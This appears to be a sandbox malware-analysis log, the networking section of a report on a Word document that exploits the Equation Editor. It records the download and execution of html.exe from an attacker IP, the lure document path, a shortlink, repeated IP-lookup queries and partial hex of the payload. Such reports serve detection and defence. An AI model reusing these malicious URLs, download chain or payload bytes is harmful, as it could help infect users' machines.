                      Source: global trafficTCP traffic: 104.168.33.34:80 -> 192.168.2.22:49172
                      Source: global trafficTCP traffic: 104.168.33.34:80 -> 192.168.2.22:49172
                      Source: global trafficTCP traffic: 104.168.33.34:80 -> 192.168.2.22:49172
                      Source: global trafficTCP traffic: 104.168.33.34:80 -> 192.168.2.22:49172
                      Source: global trafficTCP traffic: 192.168.2.22:49172 -> 104.168.33.34:80
                      Source: global trafficTCP traffic: 192.168.2.22:49172 -> 104.168.33.34:80
                      Source: global trafficTCP traffic: 104.168.33.34:80 -> 192.168.2.22:49172
                      Source: global trafficTCP traffic: 192.168.2.22:49172 -> 104.168.33.34:80
                      Source: global trafficTCP traffic: 104.168.33.34:80 -> 192.168.2.22:49172
                      Source: global trafficTCP traffic: 104.168.33.34:80 -> 192.168.2.22:49172
                      Source: global trafficTCP traffic: 104.168.33.34:80 -> 192.168.2.22:49172
                      Source: global trafficTCP traffic: 192.168.2.22:49172 -> 104.168.33.34:80
                      Source: global trafficTCP traffic: 104.168.33.34:80 -> 192.168.2.22:49172
                      Source: global trafficTCP traffic: 192.168.2.22:49172 -> 104.168.33.34:80
                      Source: global trafficTCP traffic: 192.168.2.22:49172 -> 104.168.33.34:80
                      Source: global trafficTCP traffic: 104.168.33.34:80 -> 192.168.2.22:49172
                      Source: global trafficTCP traffic: 192.168.2.22:49172 -> 104.168.33.34:80
                      Source: global trafficTCP traffic: 192.168.2.22:49172 -> 104.168.33.34:80
                      Source: global trafficTCP traffic: 104.168.33.34:80 -> 192.168.2.22:49172
                      Source: global trafficTCP traffic: 104.168.33.34:80 -> 192.168.2.22:49172
                      Source: global trafficTCP traffic: 192.168.2.22:49172 -> 104.168.33.34:80
                      Source: global trafficTCP traffic: 192.168.2.22:49172 -> 104.168.33.34:80
                      Source: global trafficTCP traffic: 192.168.2.22:49172 -> 104.168.33.34:80
                      Source: global trafficTCP traffic: 104.168.33.34:80 -> 192.168.2.22:49172
                      Source: global trafficTCP traffic: 104.168.33.34:80 -> 192.168.2.22:49172
                      Source: global trafficTCP traffic: 104.168.33.34:80 -> 192.168.2.22:49172
                      Source: global trafficTCP traffic: 104.168.33.34:80 -> 192.168.2.22:49172
                      Source: global trafficTCP traffic: 192.168.2.22:49172 -> 104.168.33.34:80
                      Source: global trafficTCP traffic: 104.168.33.34:80 -> 192.168.2.22:49172
                      Source: global trafficTCP traffic: 104.168.33.34:80 -> 192.168.2.22:49172
                      Source: global trafficTCP traffic: 104.168.33.34:80 -> 192.168.2.22:49172
                      Source: global trafficTCP traffic: 104.168.33.34:80 -> 192.168.2.22:49172
                      Source: global trafficTCP traffic: 104.168.33.34:80 -> 192.168.2.22:49172
                      Source: global trafficTCP traffic: 104.168.33.34:80 -> 192.168.2.22:49172
                      Source: global trafficTCP traffic: 104.168.33.34:80 -> 192.168.2.22:49172
                      Source: global trafficTCP traffic: 104.168.33.34:80 -> 192.168.2.22:49172
                      Source: global trafficTCP traffic: 104.168.33.34:80 -> 192.168.2.22:49172
                      Source: global trafficTCP traffic: 104.168.33.34:80 -> 192.168.2.22:49172
                      Source: global trafficTCP traffic: 104.168.33.34:80 -> 192.168.2.22:49172
                      Source: global trafficTCP traffic: 104.168.33.34:80 -> 192.168.2.22:49172
                      Source: global trafficTCP traffic: 104.168.33.34:80 -> 192.168.2.22:49172
                      Source: global trafficTCP traffic: 104.168.33.34:80 -> 192.168.2.22:49172
                      Source: global trafficTCP traffic: 192.168.2.22:49172 -> 104.168.33.34:80
                      Source: global trafficTCP traffic: 192.168.2.22:49172 -> 104.168.33.34:80
                      Source: global trafficTCP traffic: 192.168.2.22:49172 -> 104.168.33.34:80
                      Source: global trafficTCP traffic: 192.168.2.22:49172 -> 104.168.33.34:80
                      Source: global trafficTCP traffic: 192.168.2.22:49172 -> 104.168.33.34:80
                      Source: global trafficTCP traffic: 192.168.2.22:49172 -> 104.168.33.34:80
                      Source: global trafficTCP traffic: 192.168.2.22:49172 -> 104.168.33.34:80
                      Source: global trafficTCP traffic: 192.168.2.22:49172 -> 104.168.33.34:80
                      Source: global trafficTCP traffic: 192.168.2.22:49172 -> 104.168.33.34:80
                      Source: global trafficTCP traffic: 192.168.2.22:49172 -> 104.168.33.34:80
                      Source: global trafficTCP traffic: 192.168.2.22:49172 -> 104.168.33.34:80
                      Source: global trafficTCP traffic: 192.168.2.22:49172 -> 104.168.33.34:80
                      Source: global trafficTCP traffic: 192.168.2.22:49172 -> 104.168.33.34:80
                      Source: global trafficTCP traffic: 104.168.33.34:80 -> 192.168.2.22:49172
                      Source: global trafficTCP traffic: 104.168.33.34:80 -> 192.168.2.22:49172
                      Source: global trafficTCP traffic: 192.168.2.22:49172 -> 104.168.33.34:80
                      Source: global trafficTCP traffic: 104.168.33.34:80 -> 192.168.2.22:49172
                      Source: global trafficTCP traffic: 104.168.33.34:80 -> 192.168.2.22:49172
                      Source: global trafficTCP traffic: 192.168.2.22:49172 -> 104.168.33.34:80
                      Source: global trafficTCP traffic: 192.168.2.22:49172 -> 104.168.33.34:80
                      Source: global trafficTCP traffic: 104.168.33.34:80 -> 192.168.2.22:49172
                      Source: global trafficTCP traffic: 192.168.2.22:49172 -> 104.168.33.34:80
                      Source: global trafficTCP traffic: 104.168.33.34:80 -> 192.168.2.22:49172
                      Source: global trafficTCP traffic: 104.168.33.34:80 -> 192.168.2.22:49172
                      Source: global trafficTCP traffic: 192.168.2.22:49172 -> 104.168.33.34:80
                      Source: global trafficTCP traffic: 192.168.2.22:49172 -> 104.168.33.34:80
                      Source: global trafficTCP traffic: 104.168.33.34:80 -> 192.168.2.22:49172
                      Source: global trafficTCP traffic: 104.168.33.34:80 -> 192.168.2.22:49172
                      Source: global trafficTCP traffic: 192.168.2.22:49172 -> 104.168.33.34:80
                      Source: global trafficTCP traffic: 104.168.33.34:80 -> 192.168.2.22:49172
                      Source: global trafficTCP traffic: 192.168.2.22:49172 -> 104.168.33.34:80
                      Source: global trafficTCP traffic: 192.168.2.22:49172 -> 104.168.33.34:80
                      Source: global trafficTCP traffic: 104.168.33.34:80 -> 192.168.2.22:49172
                      Source: global trafficTCP traffic: 192.168.2.22:49172 -> 104.168.33.34:80
                      Source: global trafficTCP traffic: 104.168.33.34:80 -> 192.168.2.22:49172
                      Source: global trafficTCP traffic: 192.168.2.22:49172 -> 104.168.33.34:80
                      Source: global trafficTCP traffic: 192.168.2.22:49172 -> 104.168.33.34:80
                      Source: global trafficTCP traffic: 104.168.33.34:80 -> 192.168.2.22:49172
                      Source: global trafficTCP traffic: 104.168.33.34:80 -> 192.168.2.22:49172
                      Source: global trafficTCP traffic: 104.168.33.34:80 -> 192.168.2.22:49172
                      Source: global trafficTCP traffic: 192.168.2.22:49172 -> 104.168.33.34:80
                      Source: global trafficTCP traffic: 104.168.33.34:80 -> 192.168.2.22:49172
                      Source: global trafficTCP traffic: 192.168.2.22:49172 -> 104.168.33.34:80
                      Source: global trafficTCP traffic: 104.168.33.34:80 -> 192.168.2.22:49172
                      Source: global trafficTCP traffic: 192.168.2.22:49172 -> 104.168.33.34:80
                      Source: global trafficTCP traffic: 104.168.33.34:80 -> 192.168.2.22:49172
                      Source: global trafficTCP traffic: 192.168.2.22:49172 -> 104.168.33.34:80
                      Source: global trafficTCP traffic: 192.168.2.22:49172 -> 104.168.33.34:80
                      Source: global trafficTCP traffic: 192.168.2.22:49172 -> 104.168.33.34:80
                      Source: global trafficTCP traffic: 104.168.33.34:80 -> 192.168.2.22:49172
                      Source: global trafficTCP traffic: 104.168.33.34:80 -> 192.168.2.22:49172
                      Source: global trafficTCP traffic: 192.168.2.22:49172 -> 104.168.33.34:80
                      Source: global trafficTCP traffic: 104.168.33.34:80 -> 192.168.2.22:49172
                      Source: global trafficTCP traffic: 104.168.33.34:80 -> 192.168.2.22:49172
                      Source: global trafficTCP traffic: 192.168.2.22:49172 -> 104.168.33.34:80
                      Source: global trafficTCP traffic: 104.168.33.34:80 -> 192.168.2.22:49172

                      Networking

                      barindex
                      Source: Yara matchFile source: 9.2.html.exe.3b55730.9.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 9.2.html.exe.3b1a710.10.raw.unpack, type: UNPACKEDPE
                      Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXECode function: 8_2_0361062C LoadLibraryW,URLDownloadToFileW,ShellExecuteW,ExitProcess,8_2_0361062C
                      Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKDate: Mon, 06 May 2024 12:59:19 GMTServer: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.0.30Last-Modified: Mon, 06 May 2024 08:40:11 GMTETag: "b7e00-617c5048189d1"Accept-Ranges: bytesContent-Length: 753152Keep-Alive: timeout=5, max=100Connection: Keep-AliveContent-Type: application/x-msdownloadData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 03 00 b3 99 e2 d5 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 30 00 00 6a 0a 00 00 12 01 00 00 00 00 00 ae 89 0a 00 00 20 00 00 00 a0 0a 00 00 00 40 00 00 20 00 00 00 02 00 00 04 00 00 00 00 00 00 00 04 00 00 00 00 00 00 00 00 e0 0b 00 00 02 00 00 00 00 00 00 02 00 40 85 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 59 89 0a 00 4f 00 00 00 00 a0 0a 00 f0 0e 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 c0 0b 00 0c 00 00 00 0c 68 0a 00 70 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 08 00 00 00 00 00 00 00 00 00 00 00 08 20 00 00 48 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 dc 69 0a 00 00 20 00 00 00 6a 0a 00 00 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 73 72 63 00 00 00 f0 0e 01 00 00 a0 0a 00 00 10 01 00 00 6c 0a 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 0c 00 00 00 00 c0 0b 00 00 02 00 00 00 7c 0b 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 8d 89 0a 00 00 00 00 00 48 00 00 00 02 00 05 00 e4 58 00 00 d0 46 00 00 03 00 00 00 44 00 00 06 b4 9f 00 00 58 c8 09 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 13 30 02 00 69 00 00 00 01 00 00 11 02 72 01 00 00 70 7d 01 00 00 04 02 72 01 00 00 70 7d 02 00 00 04 02 28 1b 00 00 0a 00 00 02 03 7d 02 00 00 04 03 1f 3d 28 01 00 00 2b 0a 06 2c 0b 00 02 28 02 00 00 06 00 00 2b 2c 03 1f 3e 28 01 00 00 2b 0b 07 2c 0b 00 02 28 03 00 00 06 00 00 2b 15 03 1f 3c 28 01 00 00 2b 0c 08 2c 09 00 02 28 04 00 00 06 00 00 2a 00 00 00 1b 30 05 00 20 01 00 00 02 00 00 11 00 02 7b 02 00 00 04 17 8d 4f 00 00 01 25 16 1f 3d 9d 6f 1d 00 00 0a 0a 06 16 9a 6f 1e 00 00 0a 0b 07 1f 20 28 01 00 00 2b 0c 08 39 e2 00 00 00 00 07 17 8d 4f 00 00 01 25 16 1f 20 9d 6f 1d 00 00 0a 0d 09 17 9a 6f 1e 00 00 0a 13 04 06 17 9a 17 8d 4f 00 00 01 25 16 1f 0a 9d 6f 1d 00 00 0a 13 05 00 11 05 16 9a 28 1f 00 00 0a 13 06 7e 04 00 00 04 11 04 6f 20 00 00 0a 13 07 11 07 2c 6e 00 7e 04 00 00 04 11 04 6f 21 00 00 0a 13 08 7e 05 00 00 04 11 08 6f 22 00 00 0a a5 51 00 00 01 13 09 11 06
                      Source: Joe Sandbox ViewIP Address: 104.26.13.205 104.26.13.205
                      Source: Joe Sandbox ViewIP Address: 104.26.13.205 104.26.13.205
                      Source: Joe Sandbox ViewIP Address: 172.67.74.152 172.67.74.152
                      Source: Joe Sandbox ViewIP Address: 172.67.74.152 172.67.74.152
                      Source: Joe Sandbox ViewASN Name: AS-COLOCROSSINGUS AS-COLOCROSSINGUS
                      Source: Joe Sandbox ViewJA3 fingerprint: 05af1f5ca1b87cc9cc9b25185115607d
                      Source: Joe Sandbox ViewJA3 fingerprint: 7dcce5b76c8b17472d024758970a406b
                      Source: Joe Sandbox ViewJA3 fingerprint: 36f7277af969a6947a61ae0b815907a1
                      Source: C:\Users\user\AppData\Roaming\html.exeDNS query: name: api.ipify.org
                      Source: C:\Users\user\AppData\Roaming\html.exeDNS query: name: api.ipify.org
                      Source: C:\Users\user\AppData\Roaming\html.exeDNS query: name: api.ipify.org
                      Source: C:\Users\user\AppData\Roaming\html.exeDNS query: name: api.ipify.org
                      Source: C:\Users\user\AppData\Roaming\html.exeDNS query: name: api.ipify.org
                      Source: C:\Users\user\AppData\Roaming\html.exeDNS query: name: api.ipify.org
                      Source: C:\Users\user\AppData\Roaming\mpTrle\mpTrle.exeDNS query: name: api.ipify.org
                      Source: C:\Users\user\AppData\Roaming\mpTrle\mpTrle.exeDNS query: name: api.ipify.org
                      Source: C:\Users\user\AppData\Roaming\mpTrle\mpTrle.exeDNS query: name: api.ipify.org
                      Source: C:\Users\user\AppData\Roaming\mpTrle\mpTrle.exeDNS query: name: api.ipify.org
                      Source: C:\Users\user\AppData\Roaming\mpTrle\mpTrle.exeDNS query: name: api.ipify.org
                      Source: C:\Users\user\AppData\Roaming\mpTrle\mpTrle.exeDNS query: name: api.ipify.org
                      Source: global trafficHTTP traffic detected: GET /u7xc HTTP/1.1Accept: */*User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; ms-office; MSOffice 14)UA-CPU: AMD64Accept-Encoding: gzip, deflateHost: wbze.deConnection: Keep-Alive
                      Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:99.0) Gecko/20100101 Firefox/99.0Host: api.ipify.orgConnection: Keep-Alive
                      Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:99.0) Gecko/20100101 Firefox/99.0Host: api.ipify.orgConnection: Keep-Alive
                      Source: global trafficHTTP traffic detected: GET /u7xc HTTP/1.1Accept: */*User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; ms-office; MSOffice 14)UA-CPU: AMD64Accept-Encoding: gzip, deflateHost: wbze.deConnection: Keep-Alive
                      Source: global trafficHTTP traffic detected: GET /xampp/rzz/rz/beautifulanimakingsayingshewasreallybeautifultogofromtheentirekingdomtounderstandhowmuchsheloved___herlandandhusbandsheisgood.doc HTTP/1.1Accept: */*User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; ms-office; MSOffice 14)UA-CPU: AMD64Accept-Encoding: gzip, deflateHost: 104.168.33.34Connection: Keep-Alive
                      Source: global trafficHTTP traffic detected: GET /5457/html.exe HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: 104.168.33.34Connection: Keep-Alive
                      Source: unknownHTTPS traffic detected: 109.71.253.25:443 -> 192.168.2.22:49163 version: TLS 1.0
                      Source: unknownHTTPS traffic detected: 109.71.253.25:443 -> 192.168.2.22:49165 version: TLS 1.0
                      Source: unknownHTTPS traffic detected: 109.71.253.25:443 -> 192.168.2.22:49166 version: TLS 1.0
                      Source: unknownTCP traffic detected without corresponding DNS query: 104.168.33.34
                      Source: unknownTCP traffic detected without corresponding DNS query: 104.168.33.34
                      Source: unknownTCP traffic detected without corresponding DNS query: 104.168.33.34
                      Source: unknownTCP traffic detected without corresponding DNS query: 104.168.33.34
                      Source: unknownTCP traffic detected without corresponding DNS query: 104.168.33.34
                      Source: unknownTCP traffic detected without corresponding DNS query: 104.168.33.34
                      Source: unknownTCP traffic detected without corresponding DNS query: 104.168.33.34
                      Source: unknownTCP traffic detected without corresponding DNS query: 104.168.33.34
                      Source: unknownTCP traffic detected without corresponding DNS query: 104.168.33.34
                      Source: unknownTCP traffic detected without corresponding DNS query: 104.168.33.34
                      Source: unknownTCP traffic detected without corresponding DNS query: 104.168.33.34
                      Source: unknownTCP traffic detected without corresponding DNS query: 104.168.33.34
                      Source: unknownTCP traffic detected without corresponding DNS query: 104.168.33.34
                      Source: unknownTCP traffic detected without corresponding DNS query: 104.168.33.34
                      Source: unknownTCP traffic detected without corresponding DNS query: 104.168.33.34
                      Source: unknownTCP traffic detected without corresponding DNS query: 104.168.33.34
                      Source: unknownTCP traffic detected without corresponding DNS query: 104.168.33.34
                      Source: unknownTCP traffic detected without corresponding DNS query: 104.168.33.34
                      Source: unknownTCP traffic detected without corresponding DNS query: 104.168.33.34
                      Source: unknownTCP traffic detected without corresponding DNS query: 104.168.33.34
                      Source: unknownTCP traffic detected without corresponding DNS query: 104.168.33.34
                      Source: unknownTCP traffic detected without corresponding DNS query: 104.168.33.34
                      Source: unknownTCP traffic detected without corresponding DNS query: 104.168.33.34
                      Source: unknownTCP traffic detected without corresponding DNS query: 104.168.33.34
                      Source: unknownTCP traffic detected without corresponding DNS query: 104.168.33.34
                      Source: unknownTCP traffic detected without corresponding DNS query: 104.168.33.34
                      Source: unknownTCP traffic detected without corresponding DNS query: 104.168.33.34
                      Source: unknownTCP traffic detected without corresponding DNS query: 104.168.33.34
                      Source: unknownTCP traffic detected without corresponding DNS query: 104.168.33.34
                      Source: unknownTCP traffic detected without corresponding DNS query: 104.168.33.34
                      Source: unknownTCP traffic detected without corresponding DNS query: 104.168.33.34
                      Source: unknownTCP traffic detected without corresponding DNS query: 104.168.33.34
                      Source: unknownTCP traffic detected without corresponding DNS query: 104.168.33.34
                      Source: unknownTCP traffic detected without corresponding DNS query: 104.168.33.34
                      Source: unknownTCP traffic detected without corresponding DNS query: 104.168.33.34
                      Source: unknownTCP traffic detected without corresponding DNS query: 104.168.33.34
                      Source: unknownTCP traffic detected without corresponding DNS query: 104.168.33.34
                      Source: unknownTCP traffic detected without corresponding DNS query: 104.168.33.34
                      Source: unknownTCP traffic detected without corresponding DNS query: 104.168.33.34
                      Source: unknownTCP traffic detected without corresponding DNS query: 104.168.33.34
                      Source: unknownTCP traffic detected without corresponding DNS query: 104.168.33.34
                      Source: unknownTCP traffic detected without corresponding DNS query: 104.168.33.34
                      Source: unknownTCP traffic detected without corresponding DNS query: 104.168.33.34
                      Source: unknownTCP traffic detected without corresponding DNS query: 104.168.33.34
                      Source: unknownTCP traffic detected without corresponding DNS query: 104.168.33.34
                      Source: unknownTCP traffic detected without corresponding DNS query: 104.168.33.34
                      Source: unknownTCP traffic detected without corresponding DNS query: 104.168.33.34
                      Source: unknownTCP traffic detected without corresponding DNS query: 104.168.33.34
                      Source: unknownTCP traffic detected without corresponding DNS query: 104.168.33.34
                      Source: unknownTCP traffic detected without corresponding DNS query: 104.168.33.34
                      Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXECode function: 8_2_0361062C LoadLibraryW,URLDownloadToFileW,ShellExecuteW,ExitProcess,8_2_0361062C
                      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEFile created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRS{16921AF3-62CF-4133-BF32-5AC9DABD1716}.tmpJump to behavior
                      Source: global trafficHTTP traffic detected: GET /u7xc HTTP/1.1Accept: */*User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; ms-office; MSOffice 14)UA-CPU: AMD64Accept-Encoding: gzip, deflateHost: wbze.deConnection: Keep-Alive
                      Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:99.0) Gecko/20100101 Firefox/99.0Host: api.ipify.orgConnection: Keep-Alive
                      Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:99.0) Gecko/20100101 Firefox/99.0Host: api.ipify.orgConnection: Keep-Alive
                      Source: global trafficHTTP traffic detected: GET /u7xc HTTP/1.1Accept: */*User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; ms-office; MSOffice 14)UA-CPU: AMD64Accept-Encoding: gzip, deflateHost: wbze.deConnection: Keep-Alive
                      Source: global trafficHTTP traffic detected: GET /xampp/rzz/rz/beautifulanimakingsayingshewasreallybeautifultogofromtheentirekingdomtounderstandhowmuchsheloved___herlandandhusbandsheisgood.doc HTTP/1.1Accept: */*User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; ms-office; MSOffice 14)UA-CPU: AMD64Accept-Encoding: gzip, deflateHost: 104.168.33.34Connection: Keep-Alive
                      Source: global trafficHTTP traffic detected: GET /5457/html.exe HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: 104.168.33.34Connection: Keep-Alive
                      Source: html.exe, 0000000A.00000002.656986808.0000000005AC0000.00000004.00000020.00020000.00000000.sdmp, mpTrle.exe, 0000000C.00000002.455938193.0000000005A8D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: www.login.yahoo.com0 equals www.yahoo.com (Yahoo)
                      Source: global trafficDNS traffic detected: DNS query: wbze.de
                      Source: global trafficDNS traffic detected: DNS query: api.ipify.org
                      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Mon, 06 May 2024 12:59:13 GMTServer: Apache/2.4.38 (Debian)X-Powered-By: ExpressContent-Security-Policy: default-src 'none'X-Content-Type-Options: nosniffContent-Type: text/html; charset=utf-8Content-Length: 144Connection: close
                      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Mon, 06 May 2024 12:59:14 GMTServer: Apache/2.4.38 (Debian)X-Powered-By: ExpressContent-Security-Policy: default-src 'none'X-Content-Type-Options: nosniffContent-Type: text/html; charset=utf-8Content-Length: 144Connection: close
                      Source: EQNEDT32.EXE, 00000008.00000002.381980633.000000000067E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://104.168.33.34/5457/html.exe
                      Source: EQNEDT32.EXE, 00000008.00000002.381980633.000000000067E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://104.168.33.34/5457/html.exeiiC:
                      Source: EQNEDT32.EXE, 00000008.00000002.382092711.0000000003610000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://104.168.33.34/5457/html.exej
                      Source: rz on 104.168.33.34.url.0.drString found in binary or memory: http://104.168.33.34/xampp/rzz/rz/
                      Source: html.exe, 0000000A.00000002.656186717.000000000293B000.00000004.00000800.00020000.00000000.sdmp, mpTrle.exe, 0000000C.00000002.455352786.00000000023AC000.00000004.00000800.00020000.00000000.sdmp, mpTrle.exe, 00000010.00000002.656194441.000000000249C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://api.ipify.org
                      Source: html.exe, 0000000A.00000002.656986808.0000000005AEC000.00000004.00000020.00020000.00000000.sdmp, mpTrle.exe, 0000000C.00000002.455938193.0000000005AAA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.comodoca.com/AAACertificateServices.crl06
                      Source: html.exe, 0000000A.00000002.656986808.0000000005AC0000.00000004.00000020.00020000.00000000.sdmp, mpTrle.exe, 0000000C.00000002.455938193.0000000005A8D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.comodoca.com/UTN-USERFirst-Hardware.crl06
                      Source: html.exe, 0000000A.00000002.656986808.0000000005AC0000.00000004.00000020.00020000.00000000.sdmp, mpTrle.exe, 0000000C.00000002.455938193.0000000005A8D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.entrust.net/2048ca.crl0
                      Source: html.exe, 0000000A.00000002.656986808.0000000005AC0000.00000004.00000020.00020000.00000000.sdmp, mpTrle.exe, 0000000C.00000002.455938193.0000000005A8D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.entrust.net/server1.crl0
                      Source: html.exe, 0000000A.00000002.656986808.0000000005AEC000.00000004.00000020.00020000.00000000.sdmp, mpTrle.exe, 0000000C.00000002.455938193.0000000005AAA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.globalsign.net/root-r2.crl0
                      Source: html.exe, 0000000A.00000002.656986808.0000000005AC0000.00000004.00000020.00020000.00000000.sdmp, mpTrle.exe, 0000000C.00000002.455938193.0000000005A8D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.pkioverheid.nl/DomOrganisatieLatestCRL-G2.crl0
                      Source: html.exe, 0000000A.00000002.656986808.0000000005AC0000.00000004.00000020.00020000.00000000.sdmp, mpTrle.exe, 0000000C.00000002.455938193.0000000005A8D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.pkioverheid.nl/DomOvLatestCRL.crl0
                      Source: html.exe, 0000000A.00000002.656986808.0000000005AC0000.00000004.00000020.00020000.00000000.sdmp, mpTrle.exe, 0000000C.00000002.455938193.0000000005A8D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.comodoca.com0
                      Source: html.exe, 0000000A.00000002.656986808.0000000005AC0000.00000004.00000020.00020000.00000000.sdmp, mpTrle.exe, 0000000C.00000002.455938193.0000000005A8D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.comodoca.com0%
                      Source: html.exe, 0000000A.00000002.656986808.0000000005AC0000.00000004.00000020.00020000.00000000.sdmp, mpTrle.exe, 0000000C.00000002.455938193.0000000005A8D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.comodoca.com0-
                      Source: html.exe, 0000000A.00000002.656986808.0000000005AC0000.00000004.00000020.00020000.00000000.sdmp, mpTrle.exe, 0000000C.00000002.455938193.0000000005A8D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.comodoca.com0/
                      Source: html.exe, 0000000A.00000002.656986808.0000000005AC0000.00000004.00000020.00020000.00000000.sdmp, mpTrle.exe, 0000000C.00000002.455938193.0000000005A8D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.comodoca.com05
                      Source: html.exe, 0000000A.00000002.656986808.0000000005AC0000.00000004.00000020.00020000.00000000.sdmp, mpTrle.exe, 0000000C.00000002.455938193.0000000005A8D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.entrust.net03
                      Source: html.exe, 0000000A.00000002.656986808.0000000005AC0000.00000004.00000020.00020000.00000000.sdmp, mpTrle.exe, 0000000C.00000002.455938193.0000000005A8D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.entrust.net0D
